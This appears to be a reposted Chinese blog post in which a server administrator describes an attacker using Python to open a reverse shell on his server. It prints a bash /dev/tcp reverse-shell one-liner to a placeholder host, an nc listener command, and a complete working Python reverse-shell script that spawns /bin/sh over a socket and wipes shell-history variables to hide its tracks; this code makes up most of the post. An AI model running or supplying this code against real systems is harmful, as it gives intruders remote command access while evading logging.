以Python写的 反弹工具

Posted huidou

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了以Python写的 反弹工具相关的知识,希望对你有一定的参考价值。

 

我们知道,一般的反弹shell   

可以直接使用   base 反弹

bash -i >& /dev/tcp/ownip/port 0>&1

还可以使用一些简单的命令   nc  nmap 等等。。。。

nc -l -p port -vv xxx

 

经过前几次的攻击,他也变聪明了,知道我针对了php 的文件加强了管控,

所以它又有针对性的使用了Linux自带的Python  进行基于Python的反弹

 

源码:

# -*- coding:utf-8 -*-
#!/usr/bin/env python
"""
back connect py version,only linux have pty module
code by google security team
"""
import sys,os,socket,pty
shell = "/bin/sh"

def usage(name):
    print ‘python reverse connector‘
    print ‘usage: %s <ip_addr> <port>‘ % name

def main():
    if len(sys.argv) !=3:
        usage(sys.argv[0])
        sys.exit()
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    try:
        s.connect((sys.argv[1],int(sys.argv[2])))
        print ‘connect ok‘
    except:
        print ‘connect faild‘
        sys.exit()
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    global shell
    os.unsetenv("HISTFILE")
    os.unsetenv("HISTFILESIZE")
    os.unsetenv("HISTSIZE")
    os.unsetenv("HISTORY")
    os.unsetenv("HISTSAVE")
    os.unsetenv("HISTZONE")
    os.unsetenv("HISTLOG")
    os.unsetenv("HISTCMD")
    os.putenv("HISTFILE",‘/dev/null‘)
    os.putenv("HISTSIZE",‘0‘)
    os.putenv("HISTFILESIZE",‘0‘)
    pty.spawn(shell)
    s.close()

if __name__ == ‘__main__‘:
    main()

 

很恶心啊 ,可以看到通过os函数,针对环境变量无限向我服务器上传参

我查询资料 还发现  即使你禁所有端口,只开放80 端口,也还能通过Python绕过去TCP。从UDP上去。恶心至极啊!!!

谢邀大神

友情链接:

https://www.cnblogs.com/mujj/articles/3272401.html 

以上是关于以Python写的 反弹工具的主要内容,如果未能解决你的问题,请参考以下文章

学生python编辑2--反弹的小球

[工具介绍] 反弹 shell 管理工具

Python中的单例模式与反弹机制

python 反弹shell

Python3实现——反弹shell

python简单游戏-反弹球